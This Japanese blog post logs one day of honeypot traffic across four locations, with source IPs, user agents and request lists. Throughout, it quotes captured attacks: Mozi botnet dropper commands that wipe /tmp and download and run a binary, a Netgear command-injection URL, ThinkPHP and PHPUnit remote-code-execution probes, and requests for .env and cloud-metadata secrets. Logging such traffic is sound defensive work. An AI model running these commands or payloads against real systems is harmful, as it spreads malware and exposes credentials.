コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/04/09 ハニーポット(仮) 観測記録

honeypot

ハニーポット(仮) 観測記録 2021/04/09分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
Baiduspiderによるスキャン行為
curlによるスキャン行為
/.envへのスキャン行為
を確認しました。

Location:US

/.envへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
Gh0stRATのような動き
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//117[.]201[.]205[.]186:57489/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:UK

UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
cd /tmp;
rm -rf *;
wget http[:]//45[.]229[.]54[.]205:34362/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:SG

/.envへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
Gh0stRATのような動き
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:55 (前日比:+10)
US:総アクセス数:108 (前日比:+82)
UK:総アクセス数:62 (前日比:+43)
SG:総アクセス数:57 (前日比:+14)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.122.40 Romania
1 18.27.197.252 United States
1 34.121.60.216 United States
1 45.85.90.131 Netherlands
11 45.155.205.211 Russia
1 47.98.102.8 China
1 52.154.74.227 United States
1 52.161.100.31 United States
1 52.168.110.155 United States
1 52.188.23.183 United States
1 61.242.40.232 China
9 64.225.100.185 United States
1 85.208.21.51 Spain
3 89.248.172.16 United Kingdom
1 128.14.134.134 United States
7 129.159.122.158 United States
1 143.244.41.222 United Kingdom
3 157.55.198.61 United States
2 157.230.51.134 United States
4 167.99.151.220 United States
1 196.65.243.141 Morocco
1 205.185.122.102 United States
1 209.141.45.200 United States

UserAgent一覧

件数 UserAgent
7 -
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
7 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36
12 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
1 Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148
1 curl/7.64.0

リクエスト内容一覧

件数 Method Request Protocol
11 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /client_area/ HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/ HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/rtmp.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
2 GET /system_api.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webfig/ HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET http[:]//169[.]254[.]169[.]254/latest/meta-data/ HTTP/1.1
1 HEAD / HTTP/1.0\n
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 36.5.197.180 China
1 36.32.3.129 China
1 36.32.3.212 China
1 42.235.187.156 China
1 45.56.121.113 United States
1 45.85.90.131 Netherlands
22 45.155.205.211 Russia
1 45.229.54.190 Brazil
1 60.13.7.21 China
1 60.13.7.135 China
1 61.159.252.88 China
1 61.242.40.225 China
1 66.240.205.34 United States
1 68.11.64.210 United States
1 90.117.163.151 France
7 102.119.182.88 Mauritius
7 103.135.74.136 Indonesia
1 110.177.177.226 China
1 115.29.200.16 China
1 117.14.153.105 China
1 117.201.205.186 India
1 119.39.47.101 China
7 121.5.48.164 China
1 124.227.31.233 China
7 137.74.117.7 France
2 157.230.226.134 United States
3 163.172.161.118 United Kingdom
1 167.86.69.51 Germany
1 171.117.11.169 China
1 173.255.192.172 United States
1 175.184.167.23 China
1 180.95.238.246 China
3 185.51.65.218 Hungary
9 188.166.110.38 United States
7 192.144.166.192 China
1 197.210.52.66 Nigeria
1 205.185.122.102 United States
1 209.141.45.200 United States
1 220.200.162.57 China
1 220.200.162.127 China
1 221.13.12.75 China
1 223.166.74.190 China
1 223.166.74.252 China
1 223.166.75.111 China

UserAgent一覧

件数 UserAgent
12 -
2 Hello, World
1 Hello, world
36 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
10 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.2; rv:64.0.2) Gecko/20100101 Firefox/64.0.2
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.01719037 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
1 Mozilla/5.01724933 Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E302
7 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 Gh0st\xad
2 \x16\x03\x01
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
2 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
2 CONNECT www[.]so[.]com/:443 HTTP/1.1
2 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
2 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
5 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /c/version.js HTTP/1.1
1 GET /client_area/ HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
5 GET /jenkins/login HTTP/1.1
5 GET /login HTTP/1.1
5 GET /manager/html HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//117[.]201[.]205[.]186:57489/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/ HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/rtmp.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
2 GET /system_api.php HTTP/1.1
1 GET /v1/agent/self HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
5 GET /wp-login.php HTTP/1.1
2 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
2 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
2 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
2 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD / HTTP/1.0
2 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
6 POST /_ignition/execute-solution HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
8 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//grzej[.]xyz/49e8ce4bd0d737629de7acda006a0e08ef0c42a17e135e1f39690b8836f3252297e569e3706e968b22b48bf724918ef58513f7249605d2d40e4d9a9f662c39451133c8941cbc8d321db39a35bc3d976ca2fd48528be0a8ec08f934cc062c22fa HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 45.85.90.131 Netherlands
2 45.155.205.165 Russia
11 45.155.205.211 Russia
1 45.229.54.205 Brazil
1 46.101.230.137 United States
1 46.161.27.84 Russia
9 68.183.200.240 United States
3 111.7.96.133 China
10 117.50.137.13 China
1 117.242.208.224 India
10 118.25.91.65 China
1 128.14.134.134 United States
1 178.72.77.176 Russia
1 178.238.8.230 United Kingdom
7 188.127.224.117 Russia
2 205.185.122.102 United States

UserAgent一覧

件数 UserAgent
6 -
2 Chrome/54.0 (Windows NT 10.0)
2 Go-http-client/1.1
1 Hello, World
2 Hello, world
7 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
18 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
1 \x16\x03
2 \x16\x03\x01\x02
1 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP HTTP/1.1
2 GET /TP/html/public/index.php HTTP/1.1
2 GET /TP/index.php HTTP/1.1
2 GET /TP/public/index.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /client_area/ HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
2 GET /elrekt.php HTTP/1.1
1 GET /favicon.ico HTTP/1.1
2 GET /html/public/index.php HTTP/1.1
3 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
2 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
2 GET /public/index.php HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//45[.]229[.]54[.]205:34362/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/ HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/rtmp.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
2 GET /system_api.php HTTP/1.1
2 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /index.php?s=captcha HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
7 15.164.211.180 United States
1 20.82.137.184 United States
1 45.85.90.131 Netherlands
1 45.153.241.189 Germany
11 45.155.205.211 Russia
1 49.80.42.237 China
3 51.158.78.179 France
3 52.154.74.227 United States
1 59.99.140.233 India
1 66.240.205.34 United States
1 85.208.21.51 Spain
4 104.36.167.69 United States
1 117.247.203.169 India
9 138.197.67.252 United States
1 139.162.29.57 Netherlands
3 163.172.161.118 United Kingdom
1 172.104.56.90 United States
1 178.72.75.185 Russia
4 198.20.70.114 United States
2 205.185.122.102 United States

UserAgent一覧

件数 UserAgent
11 -
1 Hello, World
1 Hello, world
7 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2; rv:55.0.3) Gecko/20100101 Firefox/55.0.3
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.0; rv:52.9.0) Gecko/20100101 Firefox/52.9.0
10 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
2 \x16\x03\x01
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
6 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /client_area/ HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/ HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/rtmp.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
2 GET /system_api.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
2 POST /HNAP1/ HTTP/1.0
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//allisonhayden[.]xyz/47f654f9820bd916804bde48e5f6cbe31c1f17cff560795e2ad988e2cdca99289ccd60ddd209479309d86b0ce53aea4177810dd9e1e488963584e79a98d2a92339e1cbea68ed85126b151542ba949e8a1b72554d3e8bebbf78eb457a2ccc96b8 HTTP/1.1
1 POST http[:]//lisalancaster[.]site/b664c8772adc349035a3083794ff8ec0f408c6591e5645a752f1b21e7fbc3851a9fcb2fd54d0e682fc3de5af2fd6c7f03ddc444860cdc0f0d7e46e32deb69b73129b093c9f67558d560c12f1217597c5787257cd3f9bb05f2701613598dc7b09 HTTP/1.1